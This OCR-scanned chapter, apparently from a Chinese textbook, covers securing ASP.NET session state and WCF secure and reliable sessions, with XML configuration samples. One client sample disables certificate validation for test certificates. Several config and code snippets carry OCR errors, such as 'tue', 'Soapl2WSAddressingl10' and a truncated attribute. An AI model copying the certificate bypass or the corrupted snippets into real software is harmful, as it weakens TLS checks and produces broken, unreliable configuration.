sqlConnectionString="Data Source=MySqlServer; Integrated Security=SSPI;" 
stateNetworkTimeout="30"/> 


可 以 通过 将 会 话 状态 模式 设置 为 Off 禁用 应 用 程序 的 会 话 状 态 。 如 果 只 希望 禁用 应 用 
程序 的 某 个 特定 页 的 会 话 状态 ， 可 以 将 @Page 指令 中 的 EnableSessionState 值 设置 为 false。 
同时 ， 还 可 以 将 EnableSessionState 值 设 置 为 ReadOnly， 提 供 对 会 话 变量 的 只 读 访 问 。 


10. 并 发 请 求 和 会 话 状态 


对 ASPNET 会 话 状 态 的 访问 专属 于 每 个 会 话 ， 意 味 着 如 果 两 个 不 同 的 用 户 同时 发 送 
请 求 ， 则 会 同时 被 授予 对 每 个 单独 会 话 的 访问 。 但 是 ， 如 果 这 两 个 并 发 请 求 是 针对 同一 会 
话 的 (通过 使 用 相同 的 SessionID 值 ) ， 则 第 一 个 请 求 将 获得 对 会 话 信息 的 独占 访问 权 。 
第 二 个 请 求 将 只 在 第 一 个 请 求 完 成 之 后 执行 。 如 果 由 于 第 一 个 请 求 超过 了 锁定 超时 时 间 而 
导致 对 会 话 信息 的 独占 锁定 被 释放 ， 则 第 二 个 会 话 也 可 获得 访问 权 。 

如 果 将 @Page 指令 中 的 EnableSessionState 值 设置 为 ReadOnly， 则 对 只 读 会 话 信息 的 
请 求 不 会 导致 对 会 话 数据 的 独占 锁定 。 但 是 ， 对 会 话 数据 的 只 读 请 求 可 能 仍 需 等 到 由 会 话 
数据 的 读 写 请 求 设置 的 锁定 解除 之 后 。 


9.2 ”安全 Session 的 运行 时 


当 用 户 在 构成 Web 应 用 程序 的 不 同 ASP.NET 页 面 之 间 导 航 时 ， ASP.NET 会 话 状态 能 
够 为 用 户 进行 存储 和 检索 。ASP.NET 会 话 状态 将 一 个 限定 的 时 间 窗 口内 、 并 且 将 来 自 同 一 





13. 
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浏览 器 的 请 求 标 识 为 一 个 会 话 ， 在 该 会 话 持续 期 间 内 保留 会 话 变 量 的 值 。 浏 览 器 会 话 一 般 
在 会 话 Cookie 中 标识 ， 当 会 话 状态 配置 为 “无 Cookie” 时 ， 在 URL 中 标识 。 

默认 情况 下 ， 应 该 为 所 有 ASPNET 应 用 程序 启用 ASPNET 会 话 状态 ， 并 将 其 配置 为 
使 用 会 话 Cookie 来 标识 浏览 器 会 话 。 

一 般 来 说 , ASP.NET 会 话 状态 将 会 话 变量 值 存 储 在 内 存 中 , 但 是 也 可 以 配置 会 话 状态 ， 
将 会 话 变量 值 存 储 在 状态 服务 器 、SQL Server 或 自 定义 的 会 话 状态 存储 区 中 。 

尽管 遵循 编码 和 配置 的 最 佳 做 法 可 以 提高 应 用 程序 的 安全 性 ， 同 时 ， 使 用 Microsoft 
Windows 和 Internet Information Services (JIS) 的 最 新 安全 修补 程序 ， 以 及 Microsoft SQL 
Server、Active Directory 和 应 用 程序 的 其 他 数据 源 的 所 有 修补 程序 来 更 新 服务 器 也 很 重要 。 
下 面 是 一 些 保护 会 话 状 态 需 要 注意 的 方面 : 


1. 安全 的 会 话 状态 配置 








默认 情况 下 应 用 程序 启用 会 话 状态 功能 ， 但 如 果 应 用 程序 不 需要 会 话 状 态 ， 则 仍 应 该 
禁用 。 

2. 保证 配置 值 的 安全 

当 在 应 用 程序 的 配置 文件 中 存储 敏感 信息 时 ， 应 使 用 受 保护 配置 对 敏感 值 进行 加 密 。 
敏感 信息 包括 存储 在 machineKey 配置 元 素 中 的 加 密 密 钥 和 存储 在 connectionStrings 配置 元 
素 中 的 数据 源 连接 字符 串 。 有 关 更 多 信息 ， 请 参见 使 用 受 保护 的 配置 加 密 配置 相关 信息 。 

3. 保护 会 话 状 态 数 据 源 的 连接 

如 上 所 述 ， 对 运行 SQL Server 的 计算 机 、 会 话 状态 服务 或 其 他 数据 源 的 连接 字符 串 中 
存储 的 敏感 信息 进行 保护 非常 重要 。 若 要 确保 到 数据 服务 器 连接 的 安全 ， 建 议 使 用 “ 受 保 
护 配置 ”对 配置 中 的 连接 字符 串 信息 进行 加 密 。 

4. 使 用 集成 安全 性 连接 到 SQL Server 

读者 应 使 用 集成 安全 性 连接 到 运行 SQL Server 的 计算 机 ,以 避免 泄露 连接 字符 串 以 及 
暴露 用 户 ID 和 密码 的 可 能 性 。 如 果 指定 一 个 使 用 集成 安全 性 的 连接 , 用 来 连接 到 运行 SQL 
Server 的 计算 机 ， 则 会 话 状 态 功能 将 恢复 为 进程 标识 。 应 确保 正在 运行 ASP.NET 的 进程 标 
识 〈 如 应 用 程序 池 ) 为 默认 进程 账户 或 受 限制 的 用 户 账户 。 

5. 保护 会 话 ID 











保护 应 用 程序 和 数据 时 ， 确 保 会 话 标识 符 不 会 通过 网 络 暴露 给 不 必要 的 访问 源 ， 也 不 
会 被 用 于 针对 应 用 程序 的 重播 攻击 ， 这 一 点 很 重要 。 


6. 保护 包含 会 话 状态 的 网 页 





为 会 话 的 Timeout 超时 时 间 指 定 一 个 较 小 值 ， 也 可 以 使 用 客户 端 脚本 对 客户 端 强制 执 
行 一 个 与 会 话 超时 一 样 长 的 重 定向 ， 下 面 的 实例 演示 了 为 AddHeader 方法 添加 一 个 刷新 
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标 头 : 


Response.AddHeader ("Refresh", Session.Timeout & ";URL=Logoff.htm" 
Response.AddHeader ("Refresh", Session.Timeout + ";URL=Logoff.htm"; 


外 注意 : 如 果 指 定 无 Cookie 的 会 话 ， 需 警告 用 户 不 要 在 电子 邮件 和 书签 中 使 用 包含 
SessionID 的 链接 ,也 不 要 保存 这 些 链接 ,避免 指定 AutoDetect 和 UseDeviceProfile 
的 Cookie 模式 。 
应 用 程序 允许 用 户 注 销 , 注销 时 调用 System.Web.SessionState.HttpSessionState.Abandon 方 
法 , 警告 用 户 在 注销 后 关闭 浏览 器 。 使 用 无 Cookie 的 会 话 时 , 将 regenerateExpiredSessionID 
配置 为 tue， 在 提供 过 期 的 会 话 标识 符 时 始终 启动 一 个 新 会 话 。 


7. 使 用 安全 套 接 字 层 保护 应 用 程序 


确保 使 用 敏感 数据 的 应 用 程序 页 面 的 安全 的 方法 是 使 用 标准 Web 安全 机 制 , 如 使 用 安 
全 套 接 字 层 (SSL) 并 要 求 用 户 登 录 后 才能 执行 敏感 操作 〈 如 更 新 个 人 信息 或 删除 账户 ) 。 

此 外 ， 网 页 上 不 应 以 明文 形式 公开 敏感 数据 ， 如 密码 〈 有 时 候 还 包括 用 户 名 ) ， 确 保 
显示 这 种 信息 的 页 面 使 用 了 SSL， 并 且 仅 可 供 已 经 过 身份 验证 的 用 户 使 用 。 


8. 错误 信息 和 事件 


若 要 防止 向 不 必要 的 访问 源 公开 敏感 信息 ， 可 对 应 用 程序 进行 配置 ， 从 而 做 到 不 显示 
详细 错误 信息 ,或 者 仅 当 客户 端 是 Web 服务 器 本 身 时 才 显示 详细 错误 信息 。 有 关 更 多 信息 ， 
请 参见 customErrors 元 素 (ASPNET 设置 架构 ) 部 分 。 

如 果 服 务 器 运行 的 是 Windows Server 2003/2008, 则 可 通过 保证 事件 日 志 的 安全 、 设 置 
有 关 事 件 日 志 的 大 小 、 保 留 时 间 等 参数 等 防止 间接 拒绝 服务 攻击 , 提高 应 用 程序 的 安全 性 。 


9. 自 定义 会 话 状态 存储 提供 程序 


创建 自 定 义 会 话 状态 存储 提供 程序 时 ， 应 确保 遵循 安全 性 最 佳 做 法 ， 避 免 在 使 用 数据 
库 时 遭受 攻击 〈 如 SQL 注入 式 攻 击 ) 。 在 使 用 自 定义 会 话 状态 存储 提供 程序 时 ， 确 保 已 对 
提供 程序 进行 了 安全 性 最 佳 做 法 检查 。 








9.3 如何 创建 Session 


默认 情况 下 ， 安 全 会 话 不 会 在 已 回收 的 Web 服务 器 中 存在 。 建 立 安全 会 话 时 ， 客 户 端 
和 服务 将 缓存 与 安全 会 话 关联 的 密 钥 。 交 换 消息 时 ， 只 交换 已 缓存 密 钥 的 标识 符 。 如 果 回 
收 了 Web 服务 器 ， 也 会 回收 缓存 ，Web 服务 器 将 无 法 检索 该 标识 符 的 已 缓存 密 钥 。 这 种 
情况 将 会 引发 异常 并 返回 至 客户 端 。 如 果 使 用 有 状态 安全 上 下 文 令 牌 (SCT) ， 安 全 会 话 
可 以 在 回收 的 Web 服务 器 中 存在 。 

下 面 的 实例 将 通过 使 用 系统 提供 的 一 个 绑 定 指定 服务 使 用 安全 会 话 。 除 
basicHttpBinding Element 绑 定 外 ,在 系统 提供 的 绑 定 配置 为 使 用 消息 安全 时 ，WCEF 将 自动 
使 用 安全 会 话 。 表 9-1 所 示 为 支持 消息 安全 的 系统 提供 的 绑 定 以 及 消息 安全 是 否 是 默认 的 
安全 机 制 : 








= 5 
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表 9-1 会 话 安全 机 制 

















系统 提供 的 绑 定 配置 元 素 默认 情况 下 是 否 启用 消息 安全 
BasicHttpBinding basicHttpBinding Element 否 
WSHttpBinding wsHttpBinding Element 是 
WSDualHttpBinding wsDualHttpBinding Element 是 
WSFederationHttpBinding wsFederationHttpBinding element 是 
NetTcpBinding netTcpBinding Element 奋 
NetMsmqBinding netMsmqBinding Element 奋 





下 面 的 实例 使 用 配置 指定 名 为 wsHttpBinding Calculator 的 绑 定 ， 该 绑 定 使 用 了 
wsHttpBinding Element、 消 息 安全 和 安全 会 话 。 


<bindings> 
<WSHttpBinding> 
<binding name = "wsHttpBinding Calculator"> 
<security mode="Message"> 
<message clientCredentialType="Windows"/> 
</security> 
</binding> 
</WSHttpBinding> 
</bindings> 


接 下 来 的 代码 实例 指定 了 用 于 保护 secureCalculator 服务 的 wsHttpBinding Element、 消 
安全 和 安全 会 话 。 


全 注意 : 通过 将 establishSecurityContext 属性 设置 为 false， 可 以 为 wsHttpBinding Element 
关闭 安全 会 话 。 对 于 其 他 系统 ， 只 能 通过 创建 自 定 义 绑 定 来 关闭 安全 会 话 


假如 需要 通过 使 用 自 定义 绑 定 来 指定 服务 使 用 安全 会 话 ， 可 以 创建 一 个 自 定 义 绑 定 ， 
该 绑 定 指定 由 安全 会 话 保护 SOAP 消息 。 
下 面 的 代码 实例 使 用 配置 指定 使 用 安全 会 话 的 消息 的 自 定义 绑 定 。 


<bindings> 
<!-- configure a custom binding --> 
<customBinding> 
<binding name="customBinding Calculator"> 
<security authenticationMode="SecureConversation" /> 
<secureConversationBootstrap authenticationMode="SspiNegotiated" /> 
<textMessageEncoding messageVersion="Soapl2WSAddressingl10" writeEnc-— 
oding="utf-8"/> 
<httpTransport/> 
</binding> 
</customBinding> 
</bindings> 


9.4 利用 加 密 连 接 加 固 Session 


HTTPS 加 密 协议 无 处 不 在 ,如何 利 用 它 加 固 网 络 系统 的 传输 会 话 ， 是 本 小 节 的 讲述 习 
点 。 下 面 介绍 的 实例 演示 了 对 会 话 使 用 SSL 传输 安全 。 会 话 实现 WS-Reliable Messaging 
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协议 ， 通 过 在 会 话 上 组 合 WS-Security 获得 安全 的 可 靠 会 话 。 但 有 时 也 可 以 选择 对 SSL 改 
用 HTTP 传输 安全 。 

SSL 可 以 确保 数据 包 本 身 是 安全 的 。 需要 注意 的 是 , 这 与 使 用 WS-Secure Conversation 
确保 可 靠 会 话 的 安全 是 不 同 的 。 

车 要 使 用 基于 HTTPS 的 可 靠 会 话 ， 必 须 创 建 自 定义 绑 定 。 此 实例 是 基于 计算 器 服务 
的 入 门 示例 , 在 这 里 可 以 使 用 可 靠 会 话 绑 定 元 素 和 httpsTransport element 创建 自 定 义 绑 定 。 
下 面 代 码 是 关于 自 定 义 绑 定 的 配置 : 


<?xml version="1.0" encoding="utf-8" ?> 
<configuration> 
<system.serviceModel> 
<services> 
<service 
name="Microsoft.ServiceModel .Samples.CalculatorService" 
behaviorConfiguration="CalculatorServiceBehavior"> 
<!-- use base 有 SS provided by host --> 
<endpoint addres 
binding="customBinding" 
bindingConfiguration="reliableSessionOverHttps" 
contract="Microsoft.ServiceModel .Samples.ICalculator" /> 
<!-- the mex endpoint is exposed as 
http://localhost/servicemodelsamples/service.svc/mex--> 
<endpoint address="mex" 
binding="mexHttpBinding" 
contract="IMetadataExchange"/> 
</service> 
</services> 
<bindings> 
<customBinding> 
<binding name="reliableSessionOverHttps"> 
<reliableSession /> 
<httpsTransport /> 
</binding> 
</customBinding> 
</bindings> 
<!--For debugging purposes set the includeExceptionDetailInFaults 
attribute to true--> 
<behaviors> 
<serviceBehaviors> 
<behavior name="CalculatorServiceBehavior"> 
<serviceMetadata httpGetEnabled="true" /> 
<serviceDebug includeExceptionDetailInFaults="False" /> 





























</behavior> 
</serviceBehaviors> 
</behaviors> 
</system.serviceModel> 
</configuration> 
此 实例 中 的 程序 代码 必须 在 生成 和 运行 示例 之 前 使 用 Web 服务 器 证 书 向 导 创建 证 书 


并 进行 分 配 。 
配置 文件 设置 中 的 终结 点 定义 和 绑 定 定义 允许 使 用 自 定义 方法 ， 客 户 端 配置 如 下 
所 示 : 


<?xml] version="1.0" encoding="utf-8" ?> 
<configuration> 
<system.serviceModel> 


= es 
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<client> 
<!-- this endpoint has an https: address -—-> 
<endpoint name="" 


address="https://localhost/servicemodelsamples/service.svc" 


binding="customBinding" 


bindingConfiguration="reliableSessionOverHttps" 


contract="Microsoft.ServiceModel .Samples.ICalculator" /> 


</client> 
<bindings> 
<customBinding> 
<binding name="reliableSessionOverHttps"> 
<reliableSession /> 
<httpsTransport /> 
</binding> 
</customBinding> 
</bindings> 


</system.serviceModel> 


</configuration> 


此 示例 中 使 用 的 证 书 是 用 Makecert.exe 创建 的 测试 证 书 ， 所 以 从 浏览 器 中 访问 https 
地 址 (如 https://localhost/servicemodelsamples/service.svc) 时 就 会 出 现 安全 警报 。 为 了 允许 
WCF (Windows Communication Foundation) 客户 端 就 地 使 用 测试 证 书 , 需要 向 客户 端 添 加 


- 些 附加 代码 ， 以 禁用 安全 警报 。 
使 用 生产 证 书 时 ， 不 需要 此 代码 和 附加 类 : 
// Makecert .exe 生成 提供 测试 用 


PermissiveCertificatePolicy.Enact ("CN=ServiceModelSamples-HTTPS-Server"); 


运行 示例 时 ， 操 作 请 求 和 响应 将 显示 在 客户 端 控制 台 窗口 中 。 在 客户 端 窗口 中 按 Enter 


键 可 以 关闭 客户 端 。 


Rdd(100,15.99) = 115.99 
Subtract (145,76.54) = 68.46 
Multiply(9,81.25) = 731.25 
Divide(22,7) = 3.1428571428571 


全 注意 : 运行 前 确保 已 经 执行 Windows Communication Foundation 事例 的 首次 安装 过 程 ， 


确保 执行 Internet 信息 服务 服务 器 证 书 安装 说 明 。 


9.5 使 用 权 标 











通过 在 安全 会 话 中 使 用 有 状态 安全 上 下 文 权 标 SCT) ， 可 以 使 该 会 话 避免 因为 























新 





使 用 服务 而 受到 影响 。 如 果 在 安全 会 话 中 使 用 了 无 状态 SCT 并 且 Intemet 信息 服务 被 重 置 ， 


则 与 该 服务 相关 联 的 会 话 数 据 将 丢失 ， 这 些 会 话 数 据 包括 SCT 权 标 缓存 。 


因此 ， 当 客户 端 下 一 次 向 该 服务 发 送 无 状态 SCT 时 将 返回 错误 , 这 是 因为 无 法 检索 到 





与 该 SCT 相关 联 的 密 钥 。 但 是 ， 如 果 使 用 有 状态 SCT， 则 与 该 SCT 相关 联 
在 SCT 中 。 由 于 密 钥 包 含 在 SCT 中 并 因而 包含 在 消息 中 ， 安 全 会 话 就 不 会 














= Bs 


的 密 钥 将 包含 








因为 重新 使 用 
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服务 而 受到 影响 。 默认 情况 下 ，WCF (Windows Communication Foundation ) 在 安全 会 话 中 
使 用 无 状态 SCT。 


全 注 意 : 如 果 安 全 会 话 涉及 派生 自 IDuplexChannel 的 协议 , 则 无 法 在 该 安全 会 话 中 使 用 有 
状态 SCT。 


对 于 在 安全 会 话 中 使 用 有 状态 SCT 的 应 用 程序 , 服务 的 线程 标识 必须 是 具有 关联 配置 
文件 的 账户 。 如 果 服 务 在 不 具有 用 户 配 置 文件 的 账户 下 运行 (如 Local Service) ， 则 可 能 
引发 异常 。 

当 需 要 在 Windows XP 上 进行 模拟 时 ， 请 不 要 在 安全 会 话 中 使 用 有 状态 SCT。 如 果 在 
模拟 时 使 用 有 状态 SCT， 则 会 引发 InvalidOperationException 异常 。 

下 面 说 明 如 何在 安全 会 话 中 使 用 有 状态 SCT， 具 体 实施 步 又 如 下 : 

(1) 创建 一 个 自 定 义 绑 定 ， 该 绑 定 指定 由 使 用 有 状态 SCT 的 安全 会 话 保护 SOAP 消 
息 。 通 过 向 服务 的 配置 文件 中 添加 一 个 名 为 customBinding 的 元 素 ， 定 义 一 个 自 定义 绑 定 。 


<customBinding> 





(2) 将 <binding> 子 元 素 添加 到 customBinding 元 素 中 。 通过 在 配置 文件 中 将 name 属性 
设置 为 一 个 唯一 名 称 ， 指 定 绑 定 名 称 。 

<binding name="StatefulSCTSecureSession"> 

(3) 将 名 为 security 子 元 素 添加 到 customBinding 元 素 下 ， 指 定 发 送 到 此 服务 以 及 从 此 
服务 发 送出 去 消息 的 身份 验证 模式 。 

将 authenticationMode 属性 设置 为 SecureConversation ， 指 定 使 用 安全 会 话 。 将 
requireSecurityContextCancellation 属性 设置 为 false， 指 定 使 用 有 状态 SCT。 


<security authenticationMode="SecureConversation" 
requireSecurityContextCancellation="false"> 


(4) 将 名 为 secureConversationBootstrap 子 元 素 添 加 到 security 元 素 下 ， 指 定 在 建立 安 
全 会 话 时 如 何 对 客户 端 进行 身份 验证 。 
设置 authenticationMode 属性 ， 指 定 如 何 对 客户 端 进行 身份 验证 。 


<secureConversationBootstrap authenticationMode="UserNameForCertificate" /> 


(5) 指定 消息 编码 ， 添 加 一 个 编码 元 素 ， 如 textMessageEncoding element。 


<textMessageEncoding /> 


(6) 指定 传输 ， 添 加 一 个 传输 元 素 ， 如 httpTransport element。 

<httpTransport /> 

下 面 的 代码 实例 使 用 配置 来 指定 一 个 自 定义 绑 定 ， 将 该 绑 定 与 安全 会 话 中 的 有 状态 
SCT 结合 使 用 。 


<customBinding> 
<binding name="StatefulSCTSecureSession"> 
<security authenticationMode="SecureConversation™ 
requireSecurityContextCancellation="false"> 
<secureConversationBootstrap authenticationMode="UserNameForCertificate" /> 
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</security> 
<textMessageEncoding /> 
<httpTransport /> 
</binding> 
</customBinding> 


接 下 来 的 代码 实例 创建 了 一 个 自 定 义 绑 定 ， 该 绑 定 使 用 MutualCertificate 身份 验证 模 
式 启动 安全 会 话 。 

在 将 Windows 身份 验证 与 有 状态 SCT 结合 起 来 使 用 时 ，WCF 不 使 用 实际 调用 方 的 标 
识 来 填充 WindowsIdentity 属性 , 而 是 将 该 属性 设置 为 匿名 。 由 于 WCF 会 为 传 入 SCT 的 每 
个 请 求 重 新 创建 上 下 文 的 内 容 ， 因 此 服务 器 不 会 跟踪 内 存 中 的 安全 会 话 。 一 般 来 说 ， 不 能 
将 WindowsIdentity 实例 序列 化 为 SCT， 所 以 WindowsIdentity 属性 返回 一 个 匿名 标识 ， 配 
置 代 码 如 下 : 


<customBinding> 
<binding name="Cancellation"> 
<textMessageEncoding /> 
<security 
requireSecurityContextCancellation="false"> 
<secureConversationBootstrap /> 
</security> 
<httpTransport /> 
</binding> 
</customBinding> 

















9.6 合理 配置 Session 


本 节 将 介绍 使 用 系统 提供 的 绑 定 方法 启用 在 可 靠 会 话 内 交换 的 消息 以 及 消息 级 安全 
所 需 的 设置 步 又， 这 些 绑 定 支持 该 类 型 会 话 ， 但 不 是 在 默认 情况 下 ， 所 以 可 以 使 用 代码 或 
在 配置 文件 中 的 声明 来 启用 安全 的 可 靠 会 话 。 此 过 程 需要 使 用 客户 端 和 服务 配置 文件 。 

保护 过 程 由 以 下 三 个 关键 任务 组 成 : 

(1) 指定 客户 端 和 服务 器 在 可 靠 会 话 内 交换 消息 。 

第 一 项 任务 在 终结 点 配置 元 素 包 含 一 个 bindingConfiguration 属性 ， 该 属性 引用 名 为 
MessageSecurity 〈 在 本 示例 中 ) 的 绑 定 配置 ，<binding> 配 置 元 素 可 以 引用 此 名 称 。 将 
reliableSession 元 素 的 enabled 属性 设置 为 tue, 启用 可 靠 会 话 。 将 ordered 属性 设置 为 tue， 
可 以 保证 可 靠 会 话 内 的 有 序 传送 。 

(2) 在 可 靠 会 话 内 要 求 消息 级 安全 。 

第 二 项 任务 通过 将 包含 在 客户 端 和 服务 的 <binding> 元 素 中 的 <security> 元 素 的 mode 属 

性 设置 为 Message 完成 。 

(3) 指定 客户 端 必须 用 来 向 服务 器 进行 身份 验证 的 凭据 类 型 。 

第 三 项 任务 通过 将 包含 在 客户 端 和 服务 的 <security> 元 素 中 的 <message> 元 素 的 

clientCredentialType 属性 设置 为 Certificate 完成 。 

全 注意 : 在 与 可 靠 会 话 一 起 使 用 消息 安全 性 时 ， 如 果 未 对 客户 端 进行 身份 验证 ， 则 可 靠 消 
息 将 会 尝试 对 客户 端 进行 身份 验证 直至 发 生 超时 ， 而 不 是 在 首次 失败 时 就 引发 
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此 过 程 的 关键 部 分 是 节点 的 bindingConfiguration 属性 , 该 属性 引用 一 个 名 为 Binding1 
的 绑 定 配置 。<binding> 配 置 元 素 可 以 引用 此 名 称 , 将 reliableSession 元 素 的 enabled 属性 设 
置 为 true, 启用 可 靠 会 话 。 将 ordered 属性 设置 为 true, 可 以 为 可 靠 会 话 指定 有 序 传送 保证 。 


1. 使 用 WSHttpBinding 配 置 服务 














如 果 要 使 用 WSHttpBinding 配置 服务 ， 首 先 要 为 该 类 型 的 服务 定义 服务 协定 ， 在 服务 
类 中 实现 该 服务 协定 。 在 服务 的 实现 内 部 未 指定 地 址 或 绑 定 信息 ， 不 必 编 写 代码 也 可 从 配 
置 文件 中 检索 该 信息 。 

接 下 来 ， 创建 Web.config 文件 以 配置 CalculatorService 的 终结 点 ， 该 终结 点 将 
WSHttpBinding 与 启用 的 可 靠 会 话 和 所 需 的 消息 有 序 传送 一 起 使 用 。 

然后 ， 创 建 包含 以 下 代码 行 的 test.sve 文件 : 


<%Q@ServiceHost language=c# Service="CalculatorService" %> 

最 后 ， 将 Service.svc 文件 放 到 Intemet 信息 服务 虚拟 目录 中 。 

从 命令 行使 用 ServiceModel Metadata Utility Tool (Sveutil.exe) 以 从 服务 元 数据 生成 代 
码 。 命 令 格式 如 下 : 

Svcutil.exe <service's Metadata Exchange (MEX) address or HTTP GET address> 

生成 的 客户 端 包含 ICalculator 接口 ， 该 接口 定义 了 客户 端 实现 必须 满足 的 服务 协定 。 
生成 的 客户 端 应 用 程序 还 包含 ClientCalculator 的 实现 。 


2. 使 用 WSHttpBinding 类 的 客户 端 


在 使 用 Visual Studio 时 ， 应 在 App.config 文件 中 命名 此 文件 。 在 配置 中 设置 模式 和 
ClientCredentialType， 向 配置 文件 的 <bindings> 元 素 添加 一 个 适当 的 绑 定 。 下 面 的 实例 中 添 
加 的 元 素 分 别 是 <wsHttpBinding> 元 素 和 <binding> 元 素 , 并 将 其 name 属性 设置 为 适当 的 值 。 
对 于 <security> 元 素 ， 需 要 将 mode 属性 设置 为 Message。 

下 面 的 实例 将 模式 设置 为 Message,， 并 将 <message> 元 素 的 clientCredentialType 属性 设 
置 为 Certificate。 

<wsHttpBinding> 

<binding name="MessageSecurity"> 

<security mode="Message" /> 
<message clientCredentialType = " Certificate" /> 
</security> 

</binding> 

</wsHttpBinding > 


9.7 正确 处 理 链 接 


本 节 将 介绍 如 何 使 用 会 话 传递 安全 的 链接 参数 , 这 是 每 个 Web 系统 必 有 的 环节 。 尽管 
可 以 通过 其 他 手段 暂时 存放 一 些 数据 , 但 是 用 session 保存 URL 仍 是 最 为 简便 的 一 种 方法 。 
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由 于 URL 参数 对 于 客户 端 是 明文 形式 ， 相 当 不 安全 ， 不 提倡 用 URL 传递 一 些 敏感 的 
信息 。 但 由 于 URL 参数 是 Web 页 面 间 交 换 信息 的 重要 途径 , 可 以 用 URL 传递 一 些 看 上 去 
无 意义 的 文字 。 

1. 使 用 URL 参 数 的 要 求 


口 URL 参数 必须 要 通过 urlDecode 和 urlEncode 处 理 。 

口 URL 参数 不 能 用 于 敏感 信息 或 机 密 信 息 。 如 果 对 这 些 信息 加 密 后 传递 ， 效 率 不 如 
直接 用 Session， 代 码 也 不 如 写 Session 简便 。 

口 在 取得 URL 参数 后 必须 经 过 数据 有 效 性 验证 后 才能 使 用 。 


2. 服务 器 端 Session 的 使 用 和 管理 


如 果 Session 是 服务 器 端的 ， 很 好 的 解决 了 安全 性 问题 ， 所 以 可 以 考虑 使 用 Session 保 
存 安全 等 级 比较 高 的 信息 ， 但 Session 不 能 滥用 。 
使 用 Session 的 要 求 如 下 : 
口 项 目 中 应 该 通过 专属 于 Session 的 类 ( 暂 定名 为 SessionManager) 统一 管理 Session 
的 取 值 、 赋 值 及 清理 ， 严 禁 直接 自行 调用 Session 类 ， 要 调用 必须 通过 这 个 
SessionManager 类 。 
口 SessionManager 类 不 直接 提供 自 定 义 名 称 的 Session 使 用 (如 要 使 用 
Session[“NAME”]， 则 在 SessionManager 添加 ) ， 清 理 Session 的 方法 也 类 似 。 
口 应 尽量 减少 Session 的 使 用 ， 提 供 3 一 5 个 SessionManager 即 可 (具体 个 数 根据 项 
目 大 小 适当 调整 ) ， 相 似 作 用 的 Session 可 以 合并 ， 以 一 个 Session 保存 ， 保 存 内 
容 可 通过 一 定 方式 组 合 ， 使 用 时 再 解析 即 可 。 
口 如 果 Session 保存 的 信息 在 使 用 后 就 没 用 了 ， 要 在 第 一 时 间 清 理 ， 注 意 不 能 马上 清 
理 ， 要 从 全 局 考虑 找到 合适 的 地 方 进行 清理 ， 这 种 是 手工 方式 。 还 可 以 通过 IIS 自 
身 的 Session 有 效 期 设置 ， 一 般 20 分 钟 比较 适当 ， 局 域 网 内 的 管理 系统 可 适当 
Session 是 不 稳定 ， 但 却 并 非 完 全 不 可 用 。Session 由 于 使 用 上 有 灵活， 从 而 相对 的 ， 管 
理 上 也 就 容易 混乱 ， 所 以 大 多 数 时候 Session 异常 是 程序 本 身 的 问题 ， 合 理 的 管理 才能 保 
证 使 用 的 简便 及 安全 ， 使 用 SessionManager 类 统一 管理 的 目的 即 在 此 。 
那么 ，Session 目前 存在 的 不 稳定 问题 有 没有 办 法 得 到 解决 呢 ? 下 面 将 通过 对 几 个 常 
见 问题 的 解答 。 
Session 可 能 出 现 的 问题 举例 如 下 : 
某 画 面 中 显示 公司 职员 列表 ， 通 过 单 击 某 职员 链接 打开 新 画面 从 而 显示 该 职员 信息 ， 
单 击 多 个 职员 的 链接 则 会 打开 多 个 窗口 ，Web 上 打开 新 窗口 是 通过 脚本 实现 的 ， 若 使 用 
URL 参数 传递 此 职员 ID 不 安全 。 但 改 成 用 Session 保存 职员 ID， 然 后 在 打开 窗口 中 获取 
该 Session， 显 然 在 多 窗口 时 会 造成 混乱 。 
解决 的 办 法 是 Session 名 要 采用 动态 名 。 当 在 父 页 面 中 单 击 生成 子 页 面 时 ， 根 据 子 页 
面 的 打开 时 间 计 数值 (tick) ， 生 成 相应 的 Session 名 。 例 如 ， 要 生成 NAME 的 Session， 
格式 为 Session["NAME"+tick]。 
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这 样 ， 从 父 页 面 打 开 子 页 面 时 ， 只 需 用 URL 传 tick 值 ， 如 果 在 子 页 面 需要 取 NAME 
的 Session 值 时 ， 可 直接 由 NAME 联合 tick 确定 。 

为 保证 各 个 子 画 面 取 到 各 自 对 应 的 Session 值 ， 各 个 子 画 面 在 打开 时 都 要 带 有 tick 的 
URL 参数 ， 只 要 先 取 得 该 tick 值 即 可 确定 该 画面 对 应 的 Session 值 。 





9.8 利用 数据 库 保 存 Session 


在 日 常 的 开发 中 ， 会 话 信 息 和 状态 的 保存 一 直 是 一 个 难题 。 按 照常 规 的 方式 ， 系 统 创 
建 的 会 话 会 被 保存 到 服务 器 中 。 但 是 这 种 方式 存在 不 安全 的 因素 ， 如 果 IIS 重启 或 系统 可 
新 加 载 都 将 导致 会 话 的 丢失 。 

本 节 通 过 实例 为 自 定 义 的 会 话 状 态 存储 提供 程序 实现 ， 该 实现 使 用 ODBC .NET 框架 
数据 提供 程序 管理 Access 数据 库 中 的 会 话 信息 。 实 例 提 供 程序 使 用 System.Data.Odbc 类 ， 
通过 Access 数据 库存 储 和 检索 会 话 信息 。 

下 面 描述 有 关 会 话 状态 存储 提供 程序 的 实现 详细 信息 ， 还 有 如 何 生成 实例 并 配置 
ASP.NET 应 用 程序 以 使 用 实例 提供 程序 。 主 要 的 创建 分 以 下 儿 步 : 


1. 设计 保存 会 话 状态 的 数据 库 表 结 构 
实例 会 话 状态 提供 程序 使 用 一 个 名 为 Sessions 的 表 管 理会 话 信息 。 若 要 创建 供 实例 提 
供 程序 使 用 的 Access 表 ， 应 在 新 的 或 现 有 的 Access 数据 库 中 执行 以 下 的 数据 定义 脚本 : 


CREATE TABLE Sessions 
‘ 


En 











SessionId Text (80) NOT NULL, 
ApplicationName Text(255) NOT NULL, 
Created DateTime NOT NULL, 
Expires DateTime NOT NULL, 
LockDate DateTime NOT NULL, 
LockId Integer NOT NULL, 
Timeout Integer NOT NULL, 
Locked YesNo NOT NULL, 
SessionItems Memo, 

Flags Integer NOT NULL, 


CONSTRAINT PKSessions PRIMARY KEY (SessionId, ApplicationName) 
) 


2. 创建 事件 日 志 访 问 


如 果实 例 提供 程序 在 使 用 数据 源 时 遇 到 异常 ， 会 将 异常 的 详细 信息 写 入 到 应 用 程序 事 
件 日 志 中 ， 而 不 是 返回 ASP.NET 应 用 程序 。 这 是 一 种 安全 措施 ， 避 免 在 ASP.NET 应 用 程 
序 中 公开 有 关 数 据 源 的 私有 信息 。 

该 实例 提供 程序 指定 了 OdbcSessionStateStore 的 事件 Source 属性 值 。 在 ASPNET 应 
用 程序 能 够 成 功 写 入 应 用 程序 事件 日 志 之 前 ， 需 要 创建 下 面 的 注册 表 项 : 

